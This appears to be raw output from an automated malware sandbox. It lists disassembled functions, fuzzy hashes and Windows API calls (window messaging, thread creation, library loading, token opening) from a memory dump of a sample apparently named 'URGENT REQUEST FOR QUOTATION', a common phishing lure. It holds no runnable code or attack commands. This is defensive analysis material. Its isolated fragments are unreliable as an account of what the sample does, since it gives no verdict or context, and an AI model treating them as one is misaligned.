                                                                                                                      • Instruction ID: d18f42daa83608d3fb6f8deaae32a9aa29d9d8e9e1bfee3073adf5dc6d59e548
                                                                                                                      • Opcode Fuzzy Hash: 03274e1cd506667f71c37d26ef17afe7ebafdf5b0fbeeaaff4a4205c533c57a1
                                                                                                                      • Instruction Fuzzy Hash: 09118932604615AFDB149F28DC04EAA3BA5AF45364F158728F83ADB2F0E7349990CB90
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 000C56BB
                                                                                                                      • _wcslen.LIBCMT ref: 000C56CD
                                                                                                                      • _wcslen.LIBCMT ref: 000C56D8
                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 000C5816
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 455545452-0
                                                                                                                      • Opcode ID: 52894040982c83a0b15a0e5ea4b329c87935aa45111c4aed1466b2a589016c0a
                                                                                                                      • Instruction ID: ebd390d279b93f4e9926893f4898db91cc24a28c6b8af326aac0d07028e57c2c
                                                                                                                      • Opcode Fuzzy Hash: 52894040982c83a0b15a0e5ea4b329c87935aa45111c4aed1466b2a589016c0a
                                                                                                                      • Instruction Fuzzy Hash: 3711D379600608A6DF209F65CC85FEF77ACEF1176AB10416EF915D6081EB74EAC4CB60
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 45eeac39daaf28dd113dcbff956bbcd600c294f82d4c1a2678af4f50b585808f
                                                                                                                      • Instruction ID: df3622a80906cb5a9781c5dd74a14850f8cfaa9233c2cf005d74125fec42eba5
                                                                                                                      • Opcode Fuzzy Hash: 45eeac39daaf28dd113dcbff956bbcd600c294f82d4c1a2678af4f50b585808f
                                                                                                                      • Instruction Fuzzy Hash: 7C01D1B260AA163EF66126B86CC1FAB665FDF827B8F380325F521A12D2DB708C005170
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00091A47
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00091A59
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00091A6F
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00091A8A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: 0b87709dc3f367d965909c3a5461180eecfb64cd43e87c35d5d8c90233f44167
                                                                                                                      • Instruction ID: 5f49610bfb2376e4b64e7e4bb921e42679018f4294808924b211485280e19925
                                                                                                                      • Opcode Fuzzy Hash: 0b87709dc3f367d965909c3a5461180eecfb64cd43e87c35d5d8c90233f44167
                                                                                                                      • Instruction Fuzzy Hash: 7411FA3AE01219FFEF119BA5C985FEDBB78EB04750F200091E604B7290D6716E50EB94
                                                                                                                      APIs
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0009E1FD
                                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 0009E230
                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0009E246
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0009E24D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2880819207-0
                                                                                                                      • Opcode ID: 7c7c4a68f1227b3d3aad6f54477b2cdd75e89f8e13a5ac2963d295e62e9a61c9
                                                                                                                      • Instruction ID: 4b7b9169adb3173e20e4bfb92e158f5289372f4814cffd889db9f22cb01af219
                                                                                                                      • Opcode Fuzzy Hash: 7c7c4a68f1227b3d3aad6f54477b2cdd75e89f8e13a5ac2963d295e62e9a61c9
                                                                                                                      • Instruction Fuzzy Hash: 2A110872904254BBEB01DBA8EC05E9E7FADEB45320F144216F924D7691D6B48D0487A0
                                                                                                                      APIs
                                                                                                                      • CreateThread.KERNEL32(00000000,?,0005CFF9,00000000,00000004,00000000), ref: 0005D218
                                                                                                                      • GetLastError.KERNEL32 ref: 0005D224
                                                                                                                      • __dosmaperr.LIBCMT ref: 0005D22B
                                                                                                                      • ResumeThread.KERNEL32(00000000), ref: 0005D249
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 173952441-0
                                                                                                                      • Opcode ID: 8b0bc4593a55a820edf05afda329b82aea7912fd7d001a62ca251891b90e5686
                                                                                                                      • Instruction ID: a61c9d3e100bd9cf857884b26a079c15ce5dbf954d6bd248c091b3bd9a8ef812
                                                                                                                      • Opcode Fuzzy Hash: 8b0bc4593a55a820edf05afda329b82aea7912fd7d001a62ca251891b90e5686
                                                                                                                      • Instruction Fuzzy Hash: 2601D276805204BBEB315BA6DC09FAF7AA9DF91332F10021BFD25961D1DB748909C7A0
                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0003604C
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00036060
                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0003606A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3970641297-0
                                                                                                                      • Opcode ID: 023f6f147e3ef56352576afa6e8c9fd92ade55e37cdc71aea0f56c02f7703db8
                                                                                                                      • Instruction ID: 8e58992780ffa529b7ccd6e83a4580c24e0012c0ab5d92180ad4cfcc8a17ec26
                                                                                                                      • Opcode Fuzzy Hash: 023f6f147e3ef56352576afa6e8c9fd92ade55e37cdc71aea0f56c02f7703db8
                                                                                                                      • Instruction Fuzzy Hash: C3115B72501548BFEF264FA4DC55EEBBBADEF093A4F044215FA1892120D736EC609BA0
                                                                                                                      APIs
                                                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00053B56
                                                                                                                        • Part of subcall function 00053AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00053AD2
                                                                                                                        • Part of subcall function 00053AA3: ___AdjustPointer.LIBCMT ref: 00053AED
                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00053B6B
                                                                                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00053B7C
                                                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00053BA4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 737400349-0
                                                                                                                      • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                      • Instruction ID: ccd8080e06b4f5f0c074af5d8e5e2d3cbf6e9601b68b9ebc78007fbe908e5fcf
                                                                                                                      • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                      • Instruction Fuzzy Hash: FD014C32100148BBDF125E95CC42EEB7FADEF48799F044014FE4896122C732E965DBA0
                                                                                                                      APIs
                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,000313C6,00000000,00000000,?,0006301A,000313C6,00000000,00000000,00000000,?,0006328B,00000006,FlsSetValue), ref: 000630A5
                                                                                                                      • GetLastError.KERNEL32(?,0006301A,000313C6,00000000,00000000,00000000,?,0006328B,00000006,FlsSetValue,000D2290,FlsSetValue,00000000,00000364,?,00062E46), ref: 000630B1
                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0006301A,000313C6,00000000,00000000,00000000,?,0006328B,00000006,FlsSetValue,000D2290,FlsSetValue,00000000), ref: 000630BF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3177248105-0
                                                                                                                      • Opcode ID: 47b0de6ec336c0a5261cf801cc1356613aa858c7fadec58a55e0ebd4d4ecf9d1
                                                                                                                      • Instruction ID: da791f5f3d99fc716246a8cef39bd1493f956986c9ad78b99aeda9b1fe2bddbf
                                                                                                                      • Opcode Fuzzy Hash: 47b0de6ec336c0a5261cf801cc1356613aa858c7fadec58a55e0ebd4d4ecf9d1
                                                                                                                      • Instruction Fuzzy Hash: 78012B32301222ABFB314BB9EC54E577BDAEF05BA1B100720F909E3140CB35D909C6E0
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0009747F
                                                                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00097497
                                                                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 000974AC
                                                                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 000974CA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1352324309-0
                                                                                                                      • Opcode ID: 42aa0b5e6e70ea2cc3061012f530c04c45211cec68bc2c6bb921c92df4e11e07
                                                                                                                      • Instruction ID: 9c5d31441ef7851624e00bd2014e538c4c7f9858a060c3292139efcfb185ecbe
                                                                                                                      • Opcode Fuzzy Hash: 42aa0b5e6e70ea2cc3061012f530c04c45211cec68bc2c6bb921c92df4e11e07
                                                                                                                      • Instruction Fuzzy Hash: 2C118BB2215310ABFB308F14DC08F967BFCEB00B00F108569EA1ED6192D7B4E904EBA0
                                                                                                                      APIs
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0009ACD3,?,00008000), ref: 0009B0C4
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0009ACD3,?,00008000), ref: 0009B0E9
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0009ACD3,?,00008000), ref: 0009B0F3
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0009ACD3,?,00008000), ref: 0009B126
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2875609808-0
                                                                                                                      • Opcode ID: 0a3bccea388bffcb1d0153e5fc3544b8e90e51ea062ca56ec4140a7ac2330551
                                                                                                                      • Instruction ID: e1c38ae4d654d7f73c6dc24b882f6e652acdde96b7718d62ce4d0d0e1b676581
                                                                                                                      • Opcode Fuzzy Hash: 0a3bccea388bffcb1d0153e5fc3544b8e90e51ea062ca56ec4140a7ac2330551
                                                                                                                      • Instruction Fuzzy Hash: A011AD70C0062CE7EF10AFE5EA68AEEBF78FF4A321F014095D951B2181CB348A50DB91
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 000C7E33
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 000C7E4B
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 000C7E6F
                                                                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C7E8A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 357397906-0
                                                                                                                      • Opcode ID: 4bb7961506d6e24ffb57201a57b4974104008908a96d7d354b602dc16d7a6543
                                                                                                                      • Instruction ID: f46e47f550538d1c494ccc3a90d7283514815051053d504c7f4693f3f1d35587
                                                                                                                      • Opcode Fuzzy Hash: 4bb7961506d6e24ffb57201a57b4974104008908a96d7d354b602dc16d7a6543
                                                                                                                      • Instruction Fuzzy Hash: E51143B9D0420AAFEB41CF98C984EEEBBF5FB08310F505156E915E2210D735AA55CF50
                                                                                                                      APIs
                                                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00092DC5
                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00092DD6
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00092DDD
                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00092DE4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2710830443-0
                                                                                                                      • Opcode ID: 98ac2d8b5bf19ca6179f735499e8db3bc60afcf33c767f3a656a7700de320dc3
                                                                                                                      • Instruction ID: d60a6e998a48b001cca3257550be6f3a0831b39b78bd92ee7e69180781427880
                                                                                                                      • Opcode Fuzzy Hash: 98ac2d8b5bf19ca6179f735499e8db3bc60afcf33c767f3a656a7700de320dc3
                                                                                                                      • Instruction Fuzzy Hash: 2BE092715022247BFB201B73DC0DFEB3E6CEF43BA5F010015F50AD10809AA8C841D6B0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00049639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00049693
                                                                                                                        • Part of subcall function 00049639: SelectObject.GDI32(?,00000000), ref: 000496A2
                                                                                                                        • Part of subcall function 00049639: BeginPath.GDI32(?), ref: 000496B9
                                                                                                                        • Part of subcall function 00049639: SelectObject.GDI32(?,00000000), ref: 000496E2
                                                                                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 000C8887
                                                                                                                      • LineTo.GDI32(?,?,?), ref: 000C8894
                                                                                                                      • EndPath.GDI32(?), ref: 000C88A4
                                                                                                                      • StrokePath.GDI32(?), ref: 000C88B2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1539411459-0
                                                                                                                      • Opcode ID: edc7891ec052f00dde446346c8cf63ec379dcf9af3cdaf5e558f4776b8ace309
                                                                                                                      • Instruction ID: 4c6578dbfd07e162e59428d7d0f497ff233421bd74299c0073bec4df52c6f141
                                                                                                                      • Opcode Fuzzy Hash: edc7891ec052f00dde446346c8cf63ec379dcf9af3cdaf5e558f4776b8ace309
                                                                                                                      • Instruction Fuzzy Hash: 47F03436041258BBFB126F94AC0AFDE3A69AF0A310F148104FA55654E2CBB95561CBA9
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32(00000008), ref: 000498CC
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 000498D6
                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 000498E9
                                                                                                                      • GetStockObject.GDI32(00000005), ref: 000498F1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$ModeObjectStockText
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4037423528-0
                                                                                                                      • Opcode ID: 5cb8c29fb86a23093ba78e0c05c0857b333fd59d8c3a7904d737c099d0783669
                                                                                                                      • Instruction ID: 628aa6b61b54e910c8ae05e7aa8acb465dbfc8bb37d02677df2acf93bf791d81
                                                                                                                      • Opcode Fuzzy Hash: 5cb8c29fb86a23093ba78e0c05c0857b333fd59d8c3a7904d737c099d0783669
                                                                                                                      • Instruction Fuzzy Hash: 8BE06531644680AEFB215B75FC09FDD3F50AB12335F188219FAFD540E1C77586409B10
                                                                                                                      APIs
                                                                                                                      • GetCurrentThread.KERNEL32 ref: 00091634
                                                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,000911D9), ref: 0009163B
                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,000911D9), ref: 00091648
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,000911D9), ref: 0009164F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3974789173-0
